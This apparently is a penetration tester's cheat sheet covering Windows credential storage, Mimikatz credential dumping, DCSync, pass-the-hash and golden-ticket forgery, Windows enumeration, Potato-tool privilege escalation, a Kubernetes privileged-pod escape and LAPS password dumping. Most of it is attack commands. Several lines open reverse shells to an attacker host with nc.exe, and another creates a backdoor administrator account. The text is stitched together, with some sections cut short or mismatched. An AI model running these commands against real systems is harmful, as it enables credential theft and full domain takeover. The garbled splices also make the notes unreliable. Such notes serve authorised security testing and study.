These modules live inside LSASS to handle specific tasks.
DLL Name
Function / Description
Lsasrv.dll
The Manager. Enforces policy and chooses the protocol (Negotiate: Kerberos vs NTLM).
Msv1_0.dll
Local / NTLM. Handles non-domain logins and legacy NTLM authentication.
Kerberos.dll
Domain. Handles Kerberos ticket requests and validation.
Samsrv.dll
SAM Interface. Talks to the local SAM database.
Netlogon.dll
Network. Handles the secure channel for network logons.
Ntdsa.dll
AD Interface. Used to create/manage records in the Registry or AD.
3. Credential Storage Locations
Local Users (SAM)
File Path:%SystemRoot%\system32\config\SAM
Registry Mount:HKLM\SAM
Protection: Partially encrypted by SYSKEY (syskey.exe) to prevent offline extraction.
Content: Local user NTLM/LM hashes.
Registry Hive
Description
HKLM\SAM
Contains password hashes for local user accounts. These hashes can be extracted and cracked to reveal plaintext passwords.
HKLM\SYSTEM
Stores the system boot key, which is used to encrypt the SAM database. This key is required to decrypt the hashes.
HKLM\SECURITY
Contains sensitive information used by the Local Security Authority (LSA), including cached domain credentials (DCC2), cleartext passwords, DPAPI keys, and more.
Domain Users (NTDS)
File Path:%SystemRoot%\ntds.dit
Location: Found only on Domain Controllers.
Content: Active Directory database (Users, Groups, Computers, GPOs, Hashes).
Sync: Replicates to all DCs (except Read-Only DCs).
Credential Manager (The Vault)
Role: Stores saved passwords for RDP, Websites, and Network Shares.
Mimikatz is a post-exploitation tool that can extract plaintext passwords, hashes, PINs, and Kerberos tickets from memory. It can also perform pass-the-hash, pass-the-ticket, and build Golden Tickets.
Debug Privilege: Most Mimikatz operations require privilege::debug to access LSASS memory
Administrator Required: Mimikatz typically needs administrator privileges to function
LSASS Access: Many operations read from LSASS memory, which is protected by Windows
Detection: Mimikatz is heavily flagged by security products and EDR solutions
Pass the Hash: When using sekurlsa::pth, a new window will open - run commands in that new window
Golden Tickets: Golden Tickets are valid until the KRBTGT account password is changed (typically 180 days by default)
Ticket Files: Exported Kerberos tickets use .kirbi format
Domain Syntax: Use “.” for domain when targeting local machine accounts
Basic Usage & Privilege Escalation
# Launch Mimikatz (via SMB share)\\tsclient\share\mimikatz.exe
# Enable debug privilege (required for most operations)privilege::debug
# Elevate token to SYSTEMtoken::elevate
# Write to console in bae64 (avoid AV flagging)base64 /out:true
# Write output to a logfile (flagged by AV!)log <LOGFILE>.txt
Credential Dumping
LSASS Memory (sekurlsa)
Dump All Credentials:
# VERBOSE: Dumps credentials from all providers (Kerberos, WDigest, MSV, etc.)sekurlsa::logonpasswords
Dump WDigest Plaintext Credentials:
# Plaintext creds if WDigest is enabled (older systems or manually enabled)sekurlsa::wdigest
Dump Specific Hash Types:
# Dumps only LM/NTLM hashessekurlsa::msv
Export Kerberos Tickets:
# Avoid AV flaggingbase64 /out:true
# Export Kerberos Tickets (TGT/TGS) to disksekurlsa::tickets /export
# $ : machine tickets (computers)# @ : service tickets (users)
Extract AES Keys:
# Extract AES Keys for Pass the Key attackssekurlsa::ekeys
SAM Database
# Dumps local SAM database (local user hashes)lsadump::sam
LSA Secrets
# Patches LSASS to dump LSA policy data/hasheslsadump::lsa /patch
# Dumps LSA secrets from registry (autologon, service account passwords, etc.)lsadump::secrets
# Dump specific account (e.g., KRBTGT for Golden Ticket)lsadump::lsa /inject /name:krbtgt
DCSync
Might require runas.
# Specific userlsadump::dcsync /domain:<DOMAIN> /user:<DOMAIN>\<USER>
# For KRBTGTlsadump::dcsync /domain:<DOMAIN> /user:<DOMAIN>\krbtgt
# All users# WARNING: takes a long time... write output to a file!log dc_sync.txt
lsadump::dcsync /domain:<DOMAIN> /all
Pass the Hash (PtH)
Pass the Hash allows you to authenticate using an NTLM hash instead of a plaintext password.
# Use "." for domain if targeting local machine# IMPORTANT: Run commands inside the NEW window that pops upsekurlsa::pth /user:<USER> /ntlm:<PASS_HASH> /domain:<DOMAIN> /run:cmd.exe
Concept: Request a Kerberos Ticket (TGT) using an NTLM hash or AES Key, rather than using the NTLM protocol directly.
Extract AES Keys First:
sekurlsa::ekeys
Pass the Key with AES:
# Spawns a process. Windows will implicitly request TGT using the injected key/hash when network resources are accessed.# Can use /ntlm, /aes128, or /aes256sekurlsa::pth /domain:<DOMAIN> /user:<USER> /aes256:<AES256_KEY> /run:cmd.exe
Pass the Ticket (PtT)
Pass the Ticket allows you to use stolen Kerberos tickets to authenticate as another user.
Export Tickets:
# Export tickets from memory to .kirbi filessekurlsa::tickets /export
Inject Ticket:
# Inject ticket into current sessionkerberos::ptt <TICKET_FILE.kirbi>
misc::cmd
exit
Golden & Silver Ticket Attack
A Golden Ticket is a forged Kerberos TGT that allows you to impersonate any user in the domain, including domain administrators.
A Silver Ticket is a forged Kerberos TGS that allows you to impersonate any user on a single machine.
Step 1: Get KRBTGT Hash & SID
Method A (On DC):
lsadump::lsa /inject /name:krbtgt
Method B (Remote DCSync):
lsadump::dcsync /domain:<DOMAIN> /user:krbtgt
Step 2: Create & Inject Ticket
/ptt - This flag tells Mimikatz to inject the ticket directly into the session, meaning it is ready to be used.
/endin - The ticket lifetime. By default, Mimikatz generates a ticket that is valid for 10 years. The default Kerberos policy of AD is 10 hours (600 minutes)
/renewmax - The maximum ticket lifetime with renewal. By default, Mimikatz generates a ticket that is valid for 10 years. The default Kerberos policy of AD is 7 days (10080 minutes)
/user: can use any value including non-existent users
# OPTIONAL: Launch shell or exit and use the current shell since /ptt was usedmisc::cmd # this only works via RDPexit
# Verify ticket is working by reading DC sharedir \\<DC_FQDN>\c$\
Credential Manager
Dump credentials stored in Windows Credential Manager:
sekurlsa::credman
DPAPI (Data Protection API)
Decrypt data protected by Windows DPAPI, such as browser credentials:
for key in *id_rsa; do ssh-keygen -p -f "$key" -N "" -o ; done
Windows
# Get PS Version$PSversiontable
---
# Processes or Task Listtasklist /V | findstr <KEYWORD>
# Current User Infowhoami;hostname
whoami /priv # Show current user's privilegeswhoami /groups # Show current user's group memberships# List Users & Groupsnet user # List all local usersnet localgroup # List all local groupsnet localgroup | findstr admin
net localgroup "<GROUP>"net localgroup administrators # List members of the Administrators group# Password & Account Policynet accounts # (Local policy)net accounts /domain # (Domain policy)# Sharesnet share # Shares by current computernet use # External connected sharesGet-SmbMapping # Same but in PowerShellGet-PSDrive -PSProvider FileSystem
# Map drivenet use <DRIVE>: \\<TARGET>\<SHARE>
net use <DRIVE>: \\<TARGET>\<SHARE> /user:<USER> <PASSWORD>
# Map driveNew-PSDrive -PSProvider "FileSystem" -Name "<DRIVE>" -Root "\\<TARGET>\<SHARE>"$secpassword = ConvertTo-SecureString -AsPlainText -Force '<PASSWORD>'$cred = New-Object System.Management.Automation.PSCredential '<USERNAME>', $secpassword
New-PSDrive -PSProvider "FileSystem" -Credential $cred -Name "<DRIVE>" -Root "\\<TARGET>\<SHARE>"# Search filenamesdir /s /b <DRIVE>:\*<KEYWORD>*
Get-ChildItem -Recurse -File -Path <DRIVE>:\ -Include *<KEYWORD>*
# Search keyword in filesfindstr /s /i <KEYWORD> <DRIVE>:\*.*
Get-ChildItem -Recurse -Path <DRIVE>:\ | Select-String -Pattern "<KEYWORD>"
Change User Password
via rpcclient with ForceChangePassword perm
This will only work without the user’s old password if the authenticating user has the ForceChangePassword permission at the domain level (or obviously if the user is a Domain Administrator):
# Enable Registry Key to PtH for non-RID-500 local adminsreg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f
Mimikatz (Interactive)
# Use "." for domain if targeting local machine# IMPORTANT: Run commands inside the NEW window that pops upmimikatz.exe "privilege::debug""sekurlsa::pth /user:<USER> /ntlm:<PASS_HASH> /domain:<DOMAIN> /run:cmd.exe" exit
psexec creates a remote service by uploading a randomly-named executable to the ADMIN$ share on the target host. It then registers the service via RPC and the Windows Service Control Manager. Once established, communication happens over a named pipe, providing an interactive remote shell as SYSTEM on the victim host.
wmiexec utilizes a semi-interactive shell where commands are executed through Windows Management Instrumentation. It does not drop any files or executables on the target host and generates fewer logs than other modules. After connecting, it runs as the local admin user we connected with (this can be less obvious to someone hunting for an intrusion than seeing SYSTEM executing many commands). Note that this shell environment is not fully interactive, so each command issued will execute a new cmd.exe from WMI and execute your command. The downside of this is that if a vigilant defender checks event logs and looks at event ID 4688: A new process has been created.
# Create local user and add to local Administrators groupnet user svc_backup P@ssw0rd123! /add
net localgroup Administrators svc_backup /add
net user svc_backup
Allows a process to set its effective user ID, which can be used to gain the privileges of another user, including the root user.
cap_setgid
Allows to set its effective group ID, which can be used to gain the privileges of another group, including the root group.
cap_sys_admin
This capability provides a broad range of administrative privileges, including the ability to perform many actions reserved for the root user, such as modifying system settings and mounting and unmounting file systems.
cap_dac_override
Allows bypassing of file read, write, and execute permission checks.
# Create new podkubectl --token=$token --certificate-authority=ca.crt --server=https://<TARGET>:6443 apply -f privesc.yaml
# Verifykubectl --token=$token --certificate-authority=ca.crt --server=https://<TARGET>:6443 get pods
# Get root keykubeletctl --server <TARGET> exec "cat /root/root/.ssh/id_rsa" -p privesc -c privesc
🪟 Windows
Check [[active-directory]] for a whole host of domain-related priv escs.
Check [[security-products]] for bypasses for UAC and more.
Check [[finding-creds]] for searching for credentials.
# Running processes and servicestasklist /svc
netstat -ano
# Scheduled Tasksschtasks /query /fo LIST /v
# Env Variablesset
# Detailed machine infosysteminfo
ver
[environment]::OSVersion.Version
# Alt method for Hotfixeswmic qfe list brief
Get-HotFix | ft -AutoSize
# Query logged-in users (usually RDP)query user
# Current userecho %USERNAME%
# Current User Privs & Groupswhoami /all
# User accounts w/ DescriptionsGet-LocalUser
# All users, groups, admins, password policynet user
net user %username%
net localgroup
net localgroup administrators
net accounts
gpresult /r
# Command line history(Get-PSReadLineOption).HistorySavePath
# List Named Pipespipelist.exe /accepteula
Get-ChildItem \\.\pipe\
# Show Named Pipe Permissions# NOTE: Drop the "\\."accesschk.exe /accepteula \pipe\<NAME> -v
Privileges are tied to WHO/the user’s access token (assigned on logon, can differ local and domain), which are essentially overrides to bypass the normal rules (access rights)
SeTakeOwnershipPrivilege: Allows you to change the Owner of any object. Once you are the Owner, Windows automatically grants you the Access Right to rewrite the DACL (known as WRITE_DAC). You can then grant yourself GenericAll Access Rights.
SeImpersonatePrivilege: Allows you to copy a higher-privileged Token (e.g., NT AUTHORITY\SYSTEM via tools like SweetPotato/PrintSpoofer), instantly granting you all System Privileges and Universal Access Rights.
Access Rights (permissions) are tied to WHAT/the object (File, Folder, Registry Key, Service, Named Pipe) via “Security Descriptors”
Security Principals are the WHO/users, machines, or groups** that have their own SIDs
**groups cannot login but have Access Rights
When a Security Principal (e.g. user) wants to access a resource (e.g. file), the OS will perform an authorization check of the user against the resource’s Security Descriptor (e.g. access rights). The Security Descriptor might have multiple Access Control Entries, which will grant access if there is at least 1 match.
This policy setting determines which users or groups can access the login screen of a remote device through a Remote Desktop Services connection. A user can establish a Remote Desktop Services connection to a particular server but not be able to log on to the console of that same server.
This user right determines which users can bypass file and directory, registry, and other persistent object permissions for the purposes of backing up the system.
This policy setting determines which users can specify object access audit options for individual resources such as files, Active Directory objects, and registry keys. These objects specify their system access control lists (SACL). A user assigned this user right can also view and clear the Security log in Event Viewer.
This policy setting determines which users can take ownership of any securable object in the device, including Active Directory objects, NTFS files and folders, printers, registry keys, services, processes, and threads.
This policy setting determines which users can attach to or open any process, even a process they do not own. Developers who are debugging their applications do not need this user right. Developers who are debugging new system components need this user right. This user right provides access to sensitive and critical operating system components.
This policy setting determines which users can dynamically load and unload device drivers. This user right is not required if a signed driver for the new hardware already exists in the driver.cab file on the device. Device drivers run as highly privileged code.
This security setting determines which users can bypass file, directory, registry, and other persistent object permissions when they restore backed up files and directories. It determines which users can set valid security principals as the owner of an object.
Administrators, Local Service, Network Service, Service
This security setting determines whether a process can assume the identity of any user and, through this, obtain access to resources that the targeted user is permitted to access (impersonation). This may be assigned to antivirus or backup tools that need the ability to access all system files for scans or backups. This privilege should be reserved for service accounts requiring this access for legitimate activities.
Good Accounts
Account
Description
NT AUTHORITY\SYSTEM / LocalSystem
A highly privileged account with more privileges than a local administrator; used to run most Windows services. See LocalSystem account.
Built-in local Administrator
The built-in local administrator account. Some organizations disable this account, but many do not. It is not uncommon to see this account reused across multiple systems in a client environment.
Local member of Administrators
Another local account in the local Administrators group. Any account in this group has the same privileges as the built-in Administrator account.
Domain user in local Administrators
A standard (non-privileged) domain user who is part of the local Administrators group.
Domain admin in local Administrators
A domain admin (highly privileged in Active Directory) that is part of the local Administrators group.
Domain Admins and Enterprise Admins are “super” groups.
Server Operators
Members can modify services, access SMB shares, and backup files.
Backup Operators
Members are allowed to log onto DCs locally and should be considered Domain Admins. They can make shadow copies of the SAM/NTDS database, read the registry remotely, and access the file system on the DC via SMB. This group is sometimes added to the local Backup Operators group on non-DCs.
Print Operators
Members can log on to DCs locally and “trick” Windows into loading a malicious driver.
Hyper-V Administrators
If there are virtual DCs, any virtualization admins, such as members of Hyper-V Administrators, should be considered Domain Admins.
Account Operators
Members can modify non-protected accounts and groups in the domain.
Remote Desktop Users
Members are not given any useful permissions by default but are often granted additional rights such as Allow Login Through Remote Desktop Services and can move laterally using the RDP protocol.
Remote Management Users
Members can log on to DCs with PSRemoting (This group is sometimes added to the local remote management group on non-DCs).
Group Policy Creator Owners
Members can create new GPOs but would need to be delegated additional permissions to link GPOs to a container such as a domain or OU.
Schema Admins
Members can modify the Active Directory schema structure and backdoor any to-be-created Group/GPO by adding a compromised account to the default object ACL.
DNS Admins
Members can load a DLL on a DC, but do not have the necessary permissions to restart the DNS server. They can load a malicious DLL and wait for a reboot as a persistence mechanism. Loading a DLL will often result in the service crashing. A more reliable way to exploit this group is to create a WPAD record.
File/Folder Permissions
Look for F, M, or W assigned to unprivileged groups.
Code
Meaning
Offensive Value
F
Full Control
Jackpot. You can overwrite the file, read it, delete it, or change its permissions.
M
Modify
High. You can read, write, and delete the file. (Functionally identical to F for hijacking).
W
Write
High. You can overwrite the file with a malicious payload (e.g., a reverse shell .exe).
RX
Read & Execute
None (Usually). You can read the file and run it, but you cannot alter it.
R
Read
Low. Useful only for stealing configuration files or hardcoded credentials.
Code
Meaning
Context
(I)
Inherited
This permission wasn’t set on the file itself; it was passed down from the parent folder (e.g., C:\Program Files).
(OI)
Object Inherit
Applied to a folder: All files inside will inherit this permission.
(CI)
Container Inherit
Applied to a folder: All sub-folders inside will inherit this permission.
(IO)
Inherit Only
This permission applies only to children, not the current folder itself.
Needs SeImpersonate (or equivalent for the tool chain). Upload the chosen binary and nc.exe (or use built-in shells where documented).
RoguePotato (usage): -r is the redirector (usually your attacker host); -e is the full command line; -l runs RogueOxidResolver locally on that port (all-in-one). Optional: -c {clsid}, -p / -z pipe name.
# Listener on attackernc -lnvp <PORT>
# All-in-one: RogueOxidResolver on victim, forward/OXID redirector at attackerc:\tools\RoguePotato.exe -r <ATTACKER_IP> -e "cmd /c c:\tools\nc.exe <ATTACKER_IP> <PORT> -e cmd.exe" -l 9999# Without local RogueOxidResolver: run RogueOxidResolver.exe on the remote/redirector machine (see repo), then e.g.:c:\tools\RoguePotato.exe -r <ATTACKER_IP> -e "cmd /c c:\tools\nc.exe <ATTACKER_IP> <PORT> -e cmd.exe"
GodPotato (example): only -cmd is required; the tool supplies CLSID behavior internally.
nc -lnvp <PORT>
c:\tools\GodPotato.exe -cmd "cmd /c c:\tools\nc.exe <ATTACKER_IP> <PORT> -e cmd.exe"# As in upstream README (nc connects out; adjust paths/nc flags to your binary)c:\tools\GodPotato.exe -cmd "nc -t -e C:\Windows\System32\cmd.exe <ATTACKER_IP> <PORT>"
PrintSpoofer (usage): -c runs the command as SYSTEM; -i attaches an interactive SYSTEM process to the current console (bind/reverse/psexec-style shells).
nc -lnvp <PORT>
# Non-interactive: spawn and exit (WinRM/webshell-style) — matches upstream examplec:\tools\PrintSpoofer.exe -c "c:\tools\nc.exe <ATTACKER_IP> <PORT> -e cmd"# Interactive: SYSTEM cmd in the same console (reverse/bind shell, psexec, etc.)c:\tools\PrintSpoofer.exe -i -c cmd
PrintNightmare (usage): PowerShell via the Print Spooler (Invoke-Nightmare). By default, it creates local admin adm1n with password P@ssw0rd; use parameters to set custom credentials or load a custom DLL payload.
NOTE: this is considered dangerous and destructive since not only can it be hard to revert but also could have unintended consequences and breakages for services that use the file
# Get file infoGet-ChildItem -Path '<FILE>' | Select Fullname,LastWriteTime,Attributes,@{Name="Owner";Expression={ (Get-Acl $_.FullName).Owner }}
# Or if that fails, check the folder ownershipcmd /c dir /q '<FOLDER>'# Change ownershiptakeown /f '<FILE>'# OPTIONAL: grant *full* ACL permissions (e.g. READ)icacls '<FILE>' /grant <USER>:F
Python
The following logic can be placed under a particular module’s function (ideally at the beginning of the function) to achieve a priv esc:
import os
os.system("id")
os.system('ls -la /root/')
Wrong write permissions
# Check Python scripts itselfls -la <PYTHON_FILE>
# Later check its imports# See if imports are hookablepython3 -V
grep -r "def <FUNCTION>" /usr/local/lib/python3.8/dist-packages/<MODULE>/*
ls -l /usr/local/lib/python3.8/dist-packages/<MODULE>/__init__.py
Library Path
# Check Python library importation orderpython3 -c 'import sys; print("\n".join(sys.path))'# Check for module locationpip3 show <MODULE>
PYTHONPATH environment variable
# Sometimes the script or executable needs to be executed in a very specific mannersudo -l
# Execute over-written functionsudo PYTHONPATH=/tmp/ /usr/bin/python3 <PYTHON_FILE>
If using BloodHound check for ReadLAPSPassword in graph.
# Enumerate who can read LAPSnxc smb <DC_IP> -u <USER> -p <PASS> --laps
# Dump the passwords (if able)nxc smb <TARGET> -u <USER> -p <PASS> --laps
---
# OUT OF DATE# https://github.com/leoloobeek/LAPSToolkitwget https://raw.githubusercontent.com/leoloobeek/LAPSToolkit/refs/heads/master/LAPSToolkit.ps1
Import-Module LAPSToolkit.ps1
# Scans OUs for groups "LAPS Admins" that can read LAPS passwords on all computers in the OUFind-LAPSDelegatedGroups
# Scans Computer Objects for who has "All Extended Rights" and read passwordsFind-AdmPwdExtendedRights
# Enum computers with LAPS extension and attempts password dumpGet-LAPSComputers
